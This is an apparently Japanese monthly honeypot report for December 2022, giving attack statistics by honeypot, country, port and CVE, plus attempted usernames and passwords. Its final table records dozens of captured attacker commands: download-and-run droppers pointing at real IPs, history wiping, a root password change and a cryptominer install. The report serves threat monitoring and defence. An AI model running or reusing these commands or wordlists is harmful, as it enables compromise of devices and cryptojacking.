ハニーポット運用(月次報告:2022年12月)

今月のTopics

１．Holiday Hack Challengeの参加

2022年中旬～ 2023年1月6日 に開催された The 2022 SANS Holiday Hack Challenge に参加した。
大和セキュリティ勉強会様に参加して解き方のコツを聞けたこともあり、Endingまでたどり着いた。
念願だったSpecial Swag(パーカー&Tシャツ)も獲得できたので、次はHONABLE MENTIONSを目指す。
提出したレポートは以下の通り。
　github.com

２．Wikipediaへのフィッシングサイト登録

JR東日本の「えきねっと」のフィッシングサイトがWikipediaの外部リンク欄に掲載される事案が発生した。
対象サイトのURLはhtt[p]://eki-net.ru のロシアドメインのものであり、Googleでは2022年10月頃には公式サイトよりも上位で検索結果が表示されていた模様だ。
本編集は 2022年10月29日 (土) 13:16に地震ソフト監視人氏により追加され、 2022年12月3日 (土) 15:09にKaoru6氏にリンクが削除されるまで約1か月程度掲載されていた。
公式Wikipediaであっても記載されているリンクは疑ってかかる必要があることの良い教訓であった。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

　更新無し。

前提条件

運用日時：2022年12月1日-2022年12月31日

運用期間：31日

結果

①各ハニーポットで検知したAttack件数

T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。

No	ハニーポット	件数	先月比
1	Ddospot	2,045,784	1,180,929
2	Cowrie	748,647	▲490,125
3	Heralding	611,633	▲114,442
4	Honeytrap	513,377	77,109
5	Dionaea	244,849	▲17,279
6	Mailoney	21,867	▲17,838
7	Ciscoasa	20,352	14,764
8	Adbhoney	16,656	▲4,037
9	Tanner	5,195	1,080
10	ConPot	2,614	▲187
11	Redishoneypot	2,525	159
12	CitrixHoneypot	2,507	▲3,098
13	ElasticPot	1,489	624
14	Ipphoney	184	0
15	Dicompot	161	85

Result
- 通常時と比較してCiscoasaのアクセスが増加していた。確認すると中国から7/12 0時と7/19 12時にアクセス数が増えていた模様。

②攻撃元の国名と件数(Top 20)

各ハニーポットへの攻撃元の国名の総件数を以下に記載する。

No	攻撃元の国名	件数	先月順位
1	Brazil	1,541,966	↑(2)
2	Russia	576,186	↓(1)
3	United States	373,553	→(3)
4	Netherlands	204,274	→(4)
5	China	163,325	→(5)
6	India	67,716	↑(12)
7	Japan	61,256	↑(8)
8	Germany	58,602	↑(9)
9	Costa Rica	57,930	↑(圏外)
10	United Kingdom	57,671	↑(11)
11	Vietnam	47,781	↓(10)
12	Mexico	47,576	↑(圏外)
13	Singapore	42,467	↑(14)
14	South Korea	34,126	↑(16)
15	Bangladesh	33,499	↑(19)
16	Sweden	30,423	↑(20)
17	Indonesia	30,076	↑(18)
18	Panama	29,897	↓(17)
19	Latvia	27,080	↑(圏外)
20	Hong Kong	22,530	↑(圏外)

Result
- ブラジル(1位)のアクセス件数が突出して多い傾向にあった。
- インド(6位)以降は先月と比較して全体的なアクセス件数が2/3減少していた。

上位10ヵ国のアクセスポートの分布は以下の通り

攻撃元の国名	宛先ポート	件数
Brazil	53	1,502,976
Brazil	445	12,477
Brazil	123	2,904
Brazil	22	2,487
Brazil	23	366
Brazil	2323	209
Brazil	5555	110
Brazil	1433	62
Brazil	44323	60
Brazil	19999	53
Russia	5900	447,010
Russia	445	16,410
Russia	22	4,031
Russia	123	1,647
Russia	6379	1,076
Russia	3389	755
Russia	443	561
Russia	23	533
Russia	80	395
Russia	1433	272
United States	123	43,304
United States	53	25,318
United States	22	20,217
United States	5901	10,119
United States	445	3,789
United States	5555	3,725
United States	23	2,814
United States	3389	2,068
United States	80	1,183
United States	443	987
Netherlands	5900	154,444
Netherlands	22	1,857
Netherlands	123	1,830
Netherlands	3389	1,243
Netherlands	53	303
Netherlands	25	267
Netherlands	19	265
Netherlands	8139	81
Netherlands	80	66
Netherlands	445	62
China	123	13,582
China	22	9,998
China	23	7,617
China	445	5,071
China	1521	2,547
China	21	1,852
China	80	1,418
China	1433	1,400
China	2323	1,292
China	60023	1,186
India	445	25,799
India	22	3,969
India	123	1,162
India	23	665
India	3389	653
India	3391	220
India	60023	105
India	2323	104
India	23231	89
India	23000	59
Japan	445	19,711
Japan	123	5,624
Japan	22	3,579
Japan	62078	631
Japan	80	547
Japan	1900	356
Japan	65535	284
Japan	23	247
Japan	3128	82
Japan	4433	72
Germany	5901	11,092
Germany	123	4,685
Germany	22	3,379
Germany	23	3,124
Germany	3389	1,095
Germany	25	734
Germany	19	270
Germany	8080	239
Germany	80	220
Germany	53	205
Costa Rica	53	57,748
Costa Rica	445	61
Costa Rica	123	27
Costa Rica	22	9
United Kingdom	25	14,024
United Kingdom	123	3,033
United Kingdom	22	2,201
United Kingdom	2323	1,739
United Kingdom	8080	409
United Kingdom	23	357
United Kingdom	53	296
United Kingdom	9000	295
United Kingdom	9001	270
United Kingdom	445	250

Result
- ブラジルとコスタリカからのアクセスはDNS(53)へのアクセスが多かった。
- ロシアとニュージーランドからのアクセスはVNC(Virtual Network Computing)へのアクセスが多かった。
- アメリカと中国からのアクセスはNTP(123)へのアクセスが多かった。
- インドと日本からのアクセスはSMB(445)へのアクセスが多かった。これはWanacry関連のアクセスと考えられる。
- イギリスからのアクセスはSMTP(25)へのアクセスが多かった。
- ドイツからのアクセス(5901)が謎だった。VNC(5900)のポートフォワード(+1)へのアクセスだろうか。

③検知したCVEの脆弱性と件数

Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。

No	CVE ID	Count
1	CVE-2020-11899	579,730
2	CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255	127
3	CVE-2020-11910	7
4	CVE-2020-11900	1

Result
- 先月から変更なし

④よく攻撃されるユーザ名

ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。

No	ユーザ名	件数
1	root	33,777
2	admin	6,579
3	user	2,754
4	postgres	2,327
5	(empty)	2,058
6	jenkins	1,862
7	pi	1,681
8	nproc	1,666
9	ubuntu	1,542
10	test	1,529
11	22	1,233
12	345gs5662d34	1,224
13	sa	1,135
14	guest	1,106
15	ftpuser	849
16	oracle	815
17	knockknockwhosthere	711
18	centos	636
19	!root	624
20	2Wire	619
21	support	612
22	steam	512
23	git	469
24	www	433
25	666666	406
26	Admin	402
27	administrator	398
28	mysql	370
29	ftp	341
30	adm	338
31	blank	338
32	hadoop	330
33	$ALOC$	311
34	unknown	305
35	cameras	304
36	0	302
37	debug	301
38	web	281
39	anonymous	270
40	default	247
41	testuser	236
42	wwwroot	211
43	supervisor	206
44	ubnt	206
45	es	204
46	ec2-user	197
47	www-data	184
48	user123	183
49	elastic	182
50	vagrant	182

Result
- 特記事項なし

⑤よく攻撃されるパスワード

パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。

No	パスワード	件数
1	123456	5,539
2	(empty)	3,039
3	admin	2,426
4	password	1,948
5	nproc	1,649
6	1234	1,455
7	12345	1,307
8	3245gs5662d34	1,226
9	345gs5662d34	1,224
10	123	1,179
11	root	956
12	blank	942
13	12345678	930
14	user	733
15	knockknockwhosthere	705
16	0	639
17	666666	612
18	ubnt	519
19	test	512
20	support	494
21	1	493
22	1234567890	487
23	000000000	467
24	alpine	427
25	1qaz2wsx	424
26	hi3518	423
27	Password	422
28	111111	381
29	passw0rd	379
30	pass	376
31	1qaz@WSX	367
32	test123	352
33	master	333
34	P@ssw0rd	328
35	backup	325
36	!ishtar	315
37	123123	312
38	10023	306
39	unknown	306
40	cameras	304
41	_Cisco	302
42	synnet	282
43	Passw0rd	272
44	qwer1234	270
45	1q2w3e4r	260
46	1111	253
47	guest	252
48	password123	246
49	1234qwer	245
50	7ujMko0admin	240

Result
- 3245gs5662d34(8位)、345gs5662d34|(9位)はtelnet/sshのハニーポットであるCowrieで観測された。
- SANSでも同様の報告があった。

isc.sans.edu

knockknockwhosthere(15位)を久しぶりに観測した。
7ujMko0admin(50位)はNessus プラグインのadminユーザのデフォルトパスワードであり、パスワードの変更か無効にすることが推奨されている。

jp.tenable.com

⑥今月のmasscanとZmap

masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。

最後に

shファイルとexeファイル関連の問い合わせは以下の通り。

◆shファイルに関するアクセス

No	ファイル名	hash値(md5)	アクセス
1	****************	**********	"echo -e '\x41\x4b\x34\x37'cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://209.141.51.132/telnetsc.sh; busybox wget htt[p]://209.141.51.132/telnetsc.sh; tftp -r telnetsc.sh -g 209.141.51.132; busybox tftp -r telnetsc.sh -g 209.141.51.132; ftpget -v -u anonymous -p anonymous -P 21 209.141.51.132 telnetsc.sh telnetsc.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 209.141.51.132 telnetsc.sh telnetsc.sh; chmod 777 telnetsc.sh; busybox chmod 777 telnetsc.sh; sh telnetsc.sh; rm -rf telnetsc.sh",
2	-	-	#!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget htt[p]://23.235.171.196:88/112; curl -O htt[p]://23.235.171.196:88/112; chmod +x 112; ./112; rm -rf 123.sh; history -c; ,
3	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://107.182.129.239/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
4	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://185.246.221.138/Nyrox.sh; chmod +x Nyrox.sh; sh Nyrox.sh; rm -rf *,
5	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://193.42.33.214/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
6	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://193.42.33.81/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
7	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://193.42.33.81/Gummybins.sh; chmod +x Gummybins.sh; sh Gummybins.sh; rm -rf *,
8	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://195.58.39.18/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
9	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://195.58.39.206/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
10	-	-	cat /etc/issue ; cd /tmp; wget htt[p]://195.58.39.207/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
11	-	-	cd /data/local/tmp/; busybox wget htt[p]://104.244.76.237/jack5tr.sh; sh jack5tr.sh; curl htt[p]://104.244.76.237/jack5tr.sh; sh jack5tr.sh,
12	-	-	cd /data/local/tmp/; busybox wget htt[p]://104.244.76.7/w.sh; sh w.sh; curl htt[p]://104.244.76.7/c.sh; sh c.sh,
13	-	-	cd /data/local/tmp/; busybox wget htt[p]://141.255.160.234/w.sh; sh w.sh; curl htt[p]://141.255.160.234/c.sh; sh c.sh,
14	-	-	cd /data/local/tmp/; busybox wget htt[p]://141.255.166.2/w.sh; sh w.sh; curl htt[p]://141.255.166.2/c.sh; sh c.sh,
15	-	-	cd /data/local/tmp/; busybox wget htt[p]://185.216.71.65/w.sh; sh w.sh; curl htt[p]://185.216.71.65/c.sh; sh c.sh,
16	-	-	cd /data/local/tmp/; busybox wget htt[p]://194.180.48.182/w.sh; sh w.sh; curl htt[p]://194.180.48.182/c.sh; sh c.sh,
17	-	-	cd /data/local/tmp/; busybox wget htt[p]://195.178.120.129/w.sh; sh w.sh; curl htt[p]://195.178.120.129/c.sh; sh c.sh,
18	-	-	cd /data/local/tmp/; busybox wget htt[p]://198.98.59.99/w.sh; sh w.sh; curl htt[p]://198.98.59.99/c.sh; sh c.sh,
19	-	-	cd /data/local/tmp/; busybox wget htt[p]://45.138.74.143/w.sh; sh w.sh; curl htt[p]://45.138.74.143/c.sh; sh c.sh,
20	-	-	cd /data/local/tmp/; busybox wget htt[p]://45.138.74.77/w.sh; sh w.sh; curl htt[p]://45.138.74.77/c.sh; sh c.sh,
21	-	-	cd /data/local/tmp/; busybox wget htt[p]://5.206.227.114/w.sh; sh w.sh; curl htt[p]://5.206.227.114/c.sh; sh c.sh,
22	-	-	cd /data/local/tmp/; busybox wget htt[p]://68.183.8.55/jack5tr.sh; sh jack5tr.sh; curl htt[p]://68.183.8.55/jack5tr.sh; sh jack5tr.sh,
23	-	-	cd /data/local/tmp/; busybox wget htt[p]://68.183.8.55/jack5tr.sh; sh w.sh; curl htt[p]://68.183.8.55/jack5tr.sh; sh jack5tr.sh,
24	-	-	cd /data/local/tmp/; busybox wget htt[p]://74.201.28.102/w.sh; sh w.sh; curl htt[p]://74.201.28.102/c.sh; sh c.sh; wget htt[p]://74.201.28.102/wget.sh; sh wget.sh; curl htt[p]://74.201.28.102/wget.sh; sh wget.sh; busybox wget htt[p]://74.201.28.102/wget.sh; sh wget.sh; busybox curl htt[p]://74.201.28.102/wget.sh; sh wget.sh,
25	-	-	cd /data/local/tmp/; busybox wget htt[p]://79.137.196.249/w.sh; sh w.sh; curl htt[p]://79.137.196.249/c.sh; sh c.sh,
26	-	-	cd /data/local/tmp/; busybox wget htt[p]://84.21.172.198/w.sh; sh w.sh; curl htt[p]://84.21.172.198/c.sh; sh c.sh,
27	-	-	cd /data/local/tmp/; busybox wget htt[p]://85.209.134.231/w.sh; sh w.sh; curl htt[p]://85.209.134.231/c.sh; sh c.sh; wget htt[p]://85.209.134.231/wget.sh; sh wget.sh; curl htt[p]://85.209.134.231/wget.sh; sh wget.sh; busybox wget htt[p]://85.209.134.231/wget.sh; sh wget.sh; busybox curl htt[p]://85.209.134.231/wget.sh; sh wget.sh,
28	-	-	cd /data/local/tmp/; busybox wget htt[p]://89.208.103.151/w.sh; chmod 777 w.sh; sh w.sh; curl htt[p]://89.208.103.151/c.sh; chmod 777 c.sh;sh c.sh,
29	-	-	cd /data/local/tmp/; busybox wget htt[p]://89.208.103.75/w.sh; sh w.sh; curl htt[p]://89.208.103.75/c.sh; sh c.sh,
30	-	-	cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://111.90.143.133/w.sh; sh w.sh; curl htt[p]://111.90.143.133/c.sh; sh c.sh,
31	-	-	cd /data/local/tmp/; wget htt[p]://84.21.172.169/android.sh; chmod 777 android.sh; sh android.sh; tftp 84.21.172.169 -c get android2.sh; chmod 777 android2.sh; sh android2.sh; tftp -r android1.sh -g 84.21.172.169; chmod 777 android1.sh; sh android1.sh; ftpget 84.21.172.169 android3.sh android3.sh; sh android3.sh; rm -rf android.sh android1.sh android2.sh android3.sh,
32	-	-	cd /data/local/tmp/; wget htt[p]://84.21.172.169/android.sh; curl -O htt[p]://84.21.172.169/android.sh; sh android.sh; tftp 84.21.172.169 -c get android2.sh; sh android2.sh; tftp -r android1.sh -g 84.21.172.169; sh android1.sh; ftpget 84.21.172.169 android3.sh android3.sh; sh android3.sh; rm -rf *.sh,
33	-	-	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://104.244.76.7/jack5tr.sh; curl -O htt[p]://104.244.76.7/jack5tr.sh; chmod 777 jack5tr.sh; sh jack5tr.sh; tftp 104.244.76.7 -c get jack5tr.sh; chmod 777 jack5tr.sh; sh jack5tr.sh; tftp -r jack5tr2.sh -g 104.244.76.7; chmod 777 jack5tr2.sh; sh jack5tr2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.244.76.7 jack5tr1.sh jack5tr1.sh; sh jack5tr1.sh; rm -rf jack5tr.sh jack5tr.sh jack5tr2.sh jack5tr1.sh; rm -rf *,
34	-	-	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://195.178.120.129/ohshit.sh; curl -O htt[p]://195.178.120.129/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 195.178.120.129 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 195.178.120.129; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.178.120.129 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *,
35	-	-	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://195.58.39.254/sh; chmod 777 sh; sh sh; tftp 195.58.39.254 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r bins.sh -g 195.58.39.254; chmod 777 bins.sh; sh bins.sh; ftpget -v -u anonymous -p anonymous -P 21 195.58.39.254 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf sh bins.sh bins.sh ftp1.sh; rm -rf *,
36	-	-	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]://43.156.35.69/jack5tr.sh; curl -O htt[p]://43.156.35.69/jack5tr.sh; chmod 777 jack5tr.sh; sh jack5tr.sh; tftp 43.156.35.69 -c get jack5tr.sh; chmod 777 jack5tr.sh; sh jack5tr.sh; tftp -r jack5tr2.sh -g 43.156.35.69; chmod 777 jack5tr2.sh; sh jack5tr2.sh; ftpget -v -u anonymous -p anonymous -P 21 43.156.35.69 jack5tr1.sh jack5tr1.sh; sh jack5tr1.sh; rm -rf jack5tr.sh jack5tr.sh jack5tr2.sh jack5tr1.sh; rm -rf *,
37	-	-	cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget htt[p]s://cdn-136.anonfiles.com/a885K7May3/e3cd07d6-1671133142/bins.sh; curl -O htt[p]s://cdn-136.anonfiles.com/a885K7May3/e3cd07d6-1671133142/bins.sh; chmod +x bins.sh; sh bins.sh,
38	-	-	cd /tmp; rm -rf 351*; wget htt[p]://45.67.230.216/351.sh; curl -O htt[p]://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server,
39	-	-	cd /tmp; wget htt[p]://109.237.25.252/bins/bins.sh; chmod 777 bins.sh; ./bins.sh;,
40	-	-	cd /tmp; wget htt[p]://109.239.60.72//ok.sh; curl -o ok.sh htt[p]://109.239.60.72/ok.sh; chmod 777 ok.sh; ./ok.sh; rm -rf ok.sh; history -c,
41	-	-	cd /tmp; wget htt[p]://173.249.38.96/bins/bins.sh; chmod 777 bins.sh; ./bins.sh;,
42	-	-	cd /tmp; wget htt[p]://193.42.33.81/brian.sh; chmod +x brian.sh; sh brian.sh; rm -rf *,
43	-	-	cd /tmp; wget htt[p]://193.42.33.81/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *,
44	-	-	echo root:Min2oPasw0rd\|chpasswd\|bash; nvidia-smi; pkill xmrig; pkill cnrig; lotus wallet list; lotus; lotus-worker; lotus-miner; cat /etc/sysctl.d/21-solana-validator.conf; curl -s -L htt[p]s://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh \| bash -s 49XgAZYdbkDcBgS5nKAfz6Fyx4iD4kqoe1pTWqeCMRoc1YPgbAUx1uqSUy4UbTxPsoZd9ETowPuNBDCpUptxbSQRC4sZb42,
45	-	-	nproc;cd /tmp;wget htt[p]://209.97.132.66:81/miner.sh;bash miner.sh;cd /tmp;curl -O htt[p]://209.97.132.66:81/divu2;wget htt[p]://209.97.132.66:81/divu2;perl divu2;rm -rf divu2* miner.sh,
46	-	-	rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;